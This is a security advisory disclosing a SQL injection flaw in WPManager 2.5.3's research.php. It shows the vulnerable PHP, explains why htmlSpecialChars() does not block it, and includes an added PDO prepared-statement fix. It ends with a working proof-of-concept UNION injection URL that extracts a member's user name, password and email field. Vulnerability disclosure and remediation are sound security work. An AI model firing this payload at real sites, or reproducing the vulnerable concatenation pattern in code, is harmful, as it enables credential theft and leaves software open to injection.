# Exploit Title: WPManager <= 2.5.3 SQL injection
# Date: 02/09/2013
# Exploit Author: Groucho
# Vendor Homepage: http://wpmanager.be/
# Version: 2.5.3
# Tested on: Debian
Introduction
============
WPmanager is a simple game-oriented CMS which incorporates everything you need to create a complete website (blog, forum, etc.).
SQL injection
-------------
--------------------[research.php]-------------------------

if( isset( $_GET['treed'] ) || isset( $_POST['treed'] ) )
{
    // 'treed' is read from GET or POST and only run through htmlSpecialChars()
    $treed = ( isset( $_GET['treed'] ) ) ? htmlSpecialChars( $_GET['treed'] ) : htmlSpecialChars( $_POST['treed'] );

}

(......)

if ( $_GET['treed'] != '' )
{
    $Tpl->create_block( 'no_empty_forum_treed' );
    // $treed is concatenated directly into the SQL string
    $message_treed = mysql_query("SELECT * FROM forum_s WHERE auteur= '".$treed."' ORDER BY id DESC LIMIT 20")or die(mysql_error());
The user input named 'treed' is only passed through the htmlSpecialChars() function, which does not escape the single quote (with the default flags of the PHP versions of that time, ENT_COMPAT, only double quotes are converted). The value is then concatenated unescaped into a single-quoted SQL string literal.
Bim. SQL injection.
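As an added example that is not part of this advisory or of WPManager's code, here is the same lookup rewritten with a PDO prepared statement so that 'treed' is sent as a bound parameter and never becomes part of the SQL text. The table and column names come from the advisory; the DSN, credentials and the function name findPostsByAuthor are placeholders chosen here.

```php
<?php
// Added example, not WPManager code: parameter binding instead of string
// concatenation for the research.php lookup. Connection details are placeholders.

// Why the original filter does nothing against SQL injection: with ENT_COMPAT
// (the default before PHP 8.1) the single quote is left untouched.
var_dump(htmlspecialchars("O'Brien", ENT_COMPAT));   // string(7) "O'Brien"
var_dump(htmlspecialchars("O'Brien", ENT_QUOTES));   // string(12) "O&#039;Brien"
// Even ENT_QUOTES is HTML output encoding, not SQL escaping: the query would then
// compare against the literal text O&#039;Brien. Binding is the correct fix.

function findPostsByAuthor(PDO $pdo, string $treed): array
{
    // The SQL text contains no user data; the driver transmits the value separately.
    $stmt = $pdo->prepare(
        'SELECT * FROM forum_s WHERE auteur = :auteur ORDER BY id DESC LIMIT 20'
    );
    $stmt->bindValue(':auteur', $treed, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = new PDO(
    'mysql:host=localhost;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
    'USER_PLACEHOLDER',
    'PASS_PLACEHOLDER',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

$treed = $_GET['treed'] ?? $_POST['treed'] ?? '';
if ($treed !== '') {
    $posts = findPostsByAuthor($pdo, $treed);
    foreach ($posts as $post) {
        // Escape at output time, for the HTML context, not before the query.
        echo htmlspecialchars($post['auteur'], ENT_QUOTES, 'UTF-8'), "\n";
    }
}
```

Removing the or die(mysql_error()) pattern also stops database error text from reaching the client, which is what makes error-based injection easy to confirm.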
Proof of concept
================
You must be logged in.
http://pentest.lan/wpmanager/research.php?treed=-%27%20union%20select%201,2,3,4,5,%28select%20concat%28user,%200x3a,%20password,%200x3a,%20mailconfirme%29%20from%20membre%20where%20id=1%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20-
Groucho